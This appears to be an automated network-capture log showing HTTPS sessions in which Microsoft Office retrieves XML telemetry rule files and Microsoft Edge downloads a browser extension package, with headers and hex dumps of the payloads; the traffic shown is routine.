                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 404
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 4f99c795-b01e-0097-3bfd-274f33000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210226Z-15b8d89586fnsf5zkvx8tfb0zc00000000qg00000000btap
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                38192.168.2.54979513.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:26 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:26 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: de33ccc9-c01e-008e-25fe-267381000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210226Z-16849878b78qfbkc5yywmsbg0c00000005900000000087n0
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                39192.168.2.549793142.250.184.1934436404C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC594OUTGET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC565INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                Content-Length: 135771
                                                                                                                                                                                                                                                                                                                                X-GUploader-UploadID: AHmUCY2dAIzcLjSgIDc3OZgEHiiv2QQGd31ImEXbPbDuLyduDSEw-DWT85FvDMz_7l4esHFEDn4
                                                                                                                                                                                                                                                                                                                                X-Goog-Hash: crc32c=5YFIVw==
                                                                                                                                                                                                                                                                                                                                Server: UploadServer
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 20:33:29 GMT
                                                                                                                                                                                                                                                                                                                                Expires: Tue, 28 Oct 2025 20:33:29 GMT
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                                                Age: 1738
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 22 Oct 2024 20:33:19 GMT
                                                                                                                                                                                                                                                                                                                                ETag: a1239f8c_b608f476_b1045d58_830b10c8_3ed9cb2d
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC813INData Raw: 43 72 32 34 03 00 00 00 e2 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                                                Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC1378INData Raw: f7 ba 97 f1 3f fe f5 43 56 d7 f2 f3 3c 8c e7 4b ff e3 ef 3f c6 cf aa aa f3 6b fd 97 a1 fa fc cb e9 ac aa 1f 7f fd 71 3d bf f7 95 fc 59 5e fa b1 ea c7 1f 7f ff d7 8f 21 7f a8 4b 2e f5 e7 ab 47 d8 14 a6 6d 08 6e 1b a9 59 d7 a5 59 ab f2 b1 7f e2 d6 f5 9c 75 d3 57 66 8e a7 d2 54 4f 22 d9 3f a1 dd 8b 8d ce f7 b3 f0 55 2f 52 64 ec 9b cb 59 7f be 8e 1a 6a ee bf ff de a9 ab 48 a3 f3 51 8d bf ec 7b b7 96 fe fb f9 78 de 4f 51 f3 7e 2b 7d bb ff fe 4c d9 39 5f 12 3a 97 2c 45 97 ef ef 0b 13 71 f1 30 26 ce df 1f 49 3b 62 c4 e0 48 bb b1 11 3e ea f2 8e 02 39 b3 7d 09 42 84 80 d8 92 2e 7c e4 41 b8 a9 7c 61 8b 47 e8 1c 82 eb b9 f4 a1 91 6f f7 4f 7b e5 5c 0b 13 d5 85 cf e6 83 09 bb 83 09 54 69 a1 5a 98 fa ba 1b e6 c2 dc 9c 0f db f0 51 98 ce ef f3 fc 7e b6 70 ca 3d d5 33 ab
                                                                                                                                                                                                                                                                                                                                Data Ascii: ?CV<K?kq=Y^!K.GmnYYuWfTO"?U/RdYjHQ{xOQ~+}L9_:,Eq0&I;bH>9}B.|A|aGoO{\TiZQ~p=3
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC1378INData Raw: 78 a4 43 22 82 21 af 78 ed e5 3b 17 31 63 f2 12 16 6f 58 13 8a ac 6b 1f 08 96 b6 8e 59 b4 c8 5e 7b ff 95 e3 e3 6c 66 93 48 75 bd 57 d8 44 86 61 51 06 73 e9 21 bf d8 c1 38 0f 10 8e 94 67 c9 ae de 62 0f 6a 0d 08 71 f9 00 01 36 e4 d7 e2 f8 fd 7e ad e7 de 90 39 1c a3 5e 29 61 4c ee 81 a2 7b 44 c7 8e 2a b9 2d 76 d2 4b 76 32 2c a9 88 31 c0 6e d9 6b 8d a6 5a 8f 18 9d a2 60 79 ed cb ff 87 06 97 0d 1e 32 a3 56 32 10 9f b9 a9 d2 c4 8b 46 12 b8 5e dc 88 5e 98 61 86 3b 1d 0a 96 7b 16 9e c8 68 27 de 4a 05 5d 6c ca cd 72 ee c9 b5 fc 47 ed 73 37 d8 17 1e 9a eb 56 7a a1 49 00 ec 50 20 44 6e 0c 07 32 6b 0d f0 31 8f 82 17 33 36 ef 77 16 e0 38 a3 78 57 75 ef f7 45 fe d6 da dc 1b 3c a4 60 9b 5a c3 ab 54 de 7c 84 75 4b 00 a2 d8 aa 43 dd 63 24 a2 05 b3 ee 75 a8 ae 07 7e 6c 80
                                                                                                                                                                                                                                                                                                                                Data Ascii: xC"!x;1coXkY^{lfHuWDaQs!8gbjq6~9^)aL{D*-vKv2,1nkZ`y2V2F^^a;{h'J]lrGs7VzIP Dn2k136w8xWuE<`ZT|uKCc$u~l
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC1378INData Raw: 8f 48 d5 27 4c 9d 21 67 cf 13 d5 fd 28 ef 16 fb ab 5b b1 72 6f 45 f7 8a 4f da b3 e7 94 c8 03 e1 ba 8f ea 98 8d ad 70 5b 75 d3 db 31 31 1e 65 20 3f 73 03 a7 8c c0 5d 02 07 98 cf a2 15 9d ee 3b 96 d8 5b 6e bd d6 e7 1c e9 c6 a6 3c ec 04 df 03 02 d8 07 6a 07 4f 70 bb e6 0d 44 84 8e 31 f6 ed 1b e9 6a c5 3d 68 26 0c d9 55 07 3f b0 8e cd 25 f6 a5 bf 92 bd 1a 68 de 40 51 36 ee b9 e4 ce 81 50 6c c6 16 de 88 4e bc 66 c4 fd 22 da f5 e3 d6 a9 11 77 1e cc c8 00 69 9f 41 62 95 20 df bd 2c b1 bf 6b be 5b ba 52 77 ca c0 9b 04 7c b7 44 3b 68 e6 61 cf 76 78 4c 3a 74 24 9e d6 21 da de bf f7 1b 89 3f 5c 33 4b 7c e7 5f 9b f5 e1 23 f2 f7 8f ff 83 bf 91 02 97 ae 8d 7f 06 9c bd 4c 5d 83 7b e3 6b 6c 38 41 a1 10 8f 67 d6 26 30 9e 29 6c 6d ce c7 a7 68 e7 66 09 91 a0 a4 e8 82 d5 d0
                                                                                                                                                                                                                                                                                                                                Data Ascii: H'L!g([roEOp[u11e ?s];[n<jOpD1j=h&U?%h@Q6PlNf"wiAb ,k[Rw|D;havxL:t$!?\3K|_#L]{kl8Ag&0)lmhf
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC1378INData Raw: 21 33 d5 4d 7a 30 92 e6 a0 73 01 69 4f 6c e7 64 e7 06 c4 1f cd ca 43 29 99 d5 a9 e4 d2 27 1d 24 47 c6 70 b9 db 83 b8 ff e3 7b 43 fd 1c bd 60 8e 2a b8 9e 3b 74 be 19 0c 65 10 ff b7 71 9b 03 75 c2 bc 05 66 42 30 d4 bd 44 4c 1f e0 98 f8 e0 5e 51 d6 09 16 ee 62 8a 41 64 da 7a 3d 5a 33 a2 f1 1d 19 2a c9 80 f3 07 8d 29 4d f6 90 9d 6a f4 d8 56 61 85 9f 3a ce 4e 59 a7 6e a9 e5 ea 31 ff db f8 7b 43 fb aa 2b b5 c2 4c a8 10 57 3e 9d 12 73 e0 51 5f ef a3 40 64 48 ab 09 6b 6a 14 35 a1 2f 83 cb 26 d1 e4 cb 9d b8 cb 6e d2 3d 1d 90 fa 7e 9d 1e 6b cc d2 f8 7b 2e c6 37 f3 df 63 e9 ba ef fe 7d de f2 f4 a7 e7 2c 7f fb ee 20 7d 36 a6 a6 6a 7f 3b 2b 59 eb 18 b5 6f b9 8e 0b c1 c7 7b c1 1d 95 99 f6 ad e8 d4 b5 e8 6c ed 3f a7 af c2 af 3f 73 bf 3d ff ef 77 2d 1d cf 3d 1a be 73 e7
                                                                                                                                                                                                                                                                                                                                Data Ascii: !3Mz0siOldC)'$Gp{C`*;tequfB0DL^QbAdz=Z3*)MjVa:NYn1{C+LW>sQ_@dHkj5/&n=~k{.7c}, }6j;+Yo{l??s=w-=s
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC1378INData Raw: 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 76 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 50 03 fc 66 0a 00 20 00 00 00 00 00 01 00 18 00 00 08 b1 f4 0b 14 db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 3d 6f dc 30 0c dd fb 2b 08 cf 46 70 fd 1c b2 05 08 d0 a1 45 53 a4 59 02 64 61 4e b4 23 48 a6 04 8a 72 72 08 f2 df 4b 9d 7d 08 ce e8 d0 45 03 45 be f7 f8 1e 5f bb bd 10 2a 31 3d 77 97 af dd 44 a5 e0 48 dd 65 f7 e7 c7 d5 ef 2b f8 75 7f 77 d7 bd f5 1d bd e4 88 8c ea 13 a7 61 88 9e c9 f9 82 8f 91 dc f9 d4 75 85 87 ba db d1 17 81 b5 ef 02 6e 26 70 15 66 1f 23 20 cf cb 37 3b 84 ef 29 8d 91 e0 3a 85 3a 11 2b 54 45 06 cf 4a c2 a4 35 e7 90 72 36 84 b1 3f 42 0e df 72 66 b4 ff a2 0b 44 8c 6c 9f
                                                                                                                                                                                                                                                                                                                                Data Ascii: !-_locales/sv/messages.jsonUTPf R=o0+FpESYdaN#HrrK}EE_*1=wDHe+uwaun&pf# 7;)::+TEJ5r6?BrfDl
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC1378INData Raw: 28 b9 28 68 15 81 3d 3a d0 47 7f 87 f5 aa c5 a0 2c 48 96 b4 9f 93 24 bf 74 ca 3b a4 a0 f9 6a e6 a1 cc 40 81 91 19 30 5d a1 39 7e 39 01 48 39 a0 4f 22 d8 2a e1 e0 08 be e7 cf 6d 6c b8 0b be c9 03 07 28 7d 6a dc e2 3f 42 98 78 2d d6 a1 b1 19 12 f8 68 b4 04 85 9d 97 35 1c 1b 0c 16 5f 55 b4 c5 fe ea 43 28 83 0e 40 08 bf 0d 79 16 7a c3 cf 26 b0 46 00 0e 4b 9e 50 f8 ed 3b 0e 8c 5d 3c 0b 64 ca 72 2e 90 41 1f b1 d4 e7 ed 22 33 dd 46 8d 4d 1a 99 c7 e4 99 3c 21 86 b1 e4 d2 54 27 cf df ef 91 4e 01 0d 30 81 96 55 96 37 4e 3d d0 01 5c b2 ca 55 80 04 ec aa e2 2a 73 90 6b ac 51 58 5b 6a 0a 34 8b b4 b7 4f b0 0d b9 c6 2c a1 85 38 3d c9 71 2f 07 ef 6d df 60 8f b9 82 8c 87 80 43 e8 d4 88 fe 62 9f b4 94 b9 d7 66 ac 7c 82 88 1d 51 d1 f9 61 37 fe 39 d8 0a 53 59 ae f5 66 32 61
                                                                                                                                                                                                                                                                                                                                Data Ascii: ((h=:G,H$t;j@0]9~9H9O"*ml(}j?Bx-h5_UC(@yz&FKP;]<dr.A"3FM<!T'N0U7N=\U*skQX[j4O,8=q/m`Cbf|Qa79SYf2a
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC1378INData Raw: 7b 7a c3 30 ec 7c ed 63 70 f3 2d c2 2b 61 1b 8f d7 00 1b e0 cd 2b ef 78 f7 a3 67 c0 39 32 a9 1f 80 6c 66 17 97 d6 80 80 69 32 ab bf c3 f0 d2 d1 02 c6 d1 d1 ca 7f 28 f3 d3 05 cf d7 e6 67 96 67 73 39 3b dd 9e 5f c5 2e 08 52 5b 60 e6 23 e4 24 80 17 de cf 8c 32 61 22 26 18 40 81 51 37 1a 3d e4 69 36 45 18 6c 38 96 b1 f8 bc 04 25 63 8c 69 6f 0b 8e 93 22 11 da 2b e2 2e dd 3c 66 df 7d 3c c4 05 36 71 e2 c9 b8 a6 7e 66 b3 9b 73 21 3a a7 95 67 38 d4 83 89 c3 d7 91 64 de c5 5b 01 f5 ff a5 13 58 78 d8 a8 54 25 22 24 d8 16 40 cd 81 70 5e c5 3b d8 dd 55 72 b8 9e d6 48 15 06 41 57 68 5b e8 27 30 b1 82 0f e8 09 d8 f8 24 0d ae 73 05 91 20 6f 32 84 0d f0 82 95 ca 25 80 50 f5 46 fa 49 1e 46 5e 38 4e d2 28 ef db ce 9f 18 54 a7 c3 53 4b c7 26 a2 ba e4 21 00 dd 3a a8 e3 88 ec
                                                                                                                                                                                                                                                                                                                                Data Ascii: {z0|cp-+a+xg92lfi2(ggs9;_.R[`#$2a"&@Q7=i6El8%cio"+.<f}<6q~fs!:g8d[XxT%"$@p^;UrHAWh['0$s o2%PFIF^8N(TSK&!:
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC1378INData Raw: 15 a1 54 1e 5a 8d 72 3d e2 47 40 31 01 b6 e2 e3 20 ba 53 87 b9 64 39 96 a9 1f 50 8d c3 df 89 4f 3c 44 83 14 ce e2 33 f3 a3 46 d1 e2 45 58 a7 2c f7 48 0a 04 81 50 14 d0 11 86 4d 66 e7 ff be d5 aa ce 18 47 ec d9 2c f8 22 13 e5 35 27 b7 b0 97 2a bf 2c 0b d7 07 48 d7 30 c9 86 93 1f b0 17 3e b8 b1 bc a7 01 17 51 9c 66 55 50 9a b0 bb 80 25 f5 6f 33 e1 cf d4 9d 1c 93 ba 54 72 a7 e2 f6 75 97 90 fe 6f d2 46 10 67 11 75 4c 7e d0 94 af e3 4d 5d b4 38 17 ad 83 c4 09 26 df 24 fb 10 6d 5d e5 56 f8 11 0d 2d bb f3 2c 35 9d 43 aa d3 dc cc 21 ae 95 db 49 63 90 e8 bb b5 a2 31 68 28 4f c1 46 84 c4 ae 85 65 77 6e 1d 5c 72 28 c5 cb d9 9f 0c 82 36 6a 85 c3 0c cb 86 67 50 98 fd a8 5e 6f c5 03 8b 54 f3 c2 30 f0 94 72 6d 96 45 e2 75 68 b3 3c 02 83 6b 79 2f ae 25 09 87 d3 41 99 c5
                                                                                                                                                                                                                                                                                                                                Data Ascii: TZr=G@1 Sd9PO<D3FEX,HPMfG,"5'*,H0>QfUP%o3TruoFguL~M]8&$m]V-,5C!Ic1h(OFewn\r(6jgP^oT0rmEuh<ky/%A
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC1378INData Raw: 18 e4 0f c3 f4 76 5f 5c be dd ce 6f 88 69 ac e4 50 fa ee 07 ab c8 a0 8b 52 e9 bb 55 6b fa 9f c6 22 3c 29 b7 da 31 d5 9e ae 5a b0 94 e9 7c 5c e7 66 a1 94 56 e8 81 c0 57 d2 a5 5b 41 6a 0e 92 60 dd 9b c4 c3 77 12 c5 dc 29 96 c5 76 0c 56 10 bf 85 d3 7f df 78 05 8d e2 78 fc 2e d0 e2 68 c5 5e ba e2 78 a2 f7 ae 74 a2 c9 5d 23 c5 a1 dd 77 87 05 87 09 52 cb 31 68 27 3d 4b 9d 65 b2 de 77 fd b1 ff 96 4d 3f 5e 60 b9 1e 38 a4 9e c8 b0 ea d5 db 24 51 55 05 52 b6 f2 27 f0 e4 fd 6c 75 91 a7 7f 43 1e 77 ee c0 54 0b 56 cd 31 4f 5e ee ea 9b de 9a b3 38 11 b7 da d9 f9 e5 0f 50 4b 07 08 fd 45 55 f9 17 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6d 6e 2f 6d 65 73 73 61 67 65 73 2e 6a
                                                                                                                                                                                                                                                                                                                                Data Ascii: v_\oiPRUk"<)1Z|\fVW[Aj`w)vVxx.h^xt]#wR1h'=KewM?^`8$QUR'luCwTV1O^8PKEUPK!-_locales/mn/messages.j


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                40192.168.2.54980613.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 499
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                                                                                                                                                                                ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                                                                                                                                                                                x-ms-request-id: 54a08b66-801e-008f-529b-272c5d000000
                                                                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                x-azure-ref: 20241028T210227Z-16849878b785jrf8dn0d2rczaw00000006pg00000000mt6d
                                                                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                41192.168.2.54980813.107.246.60443
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                2024-10-28 21:02:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                Date: Mon, 28 Oct 2024 21:02:27 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
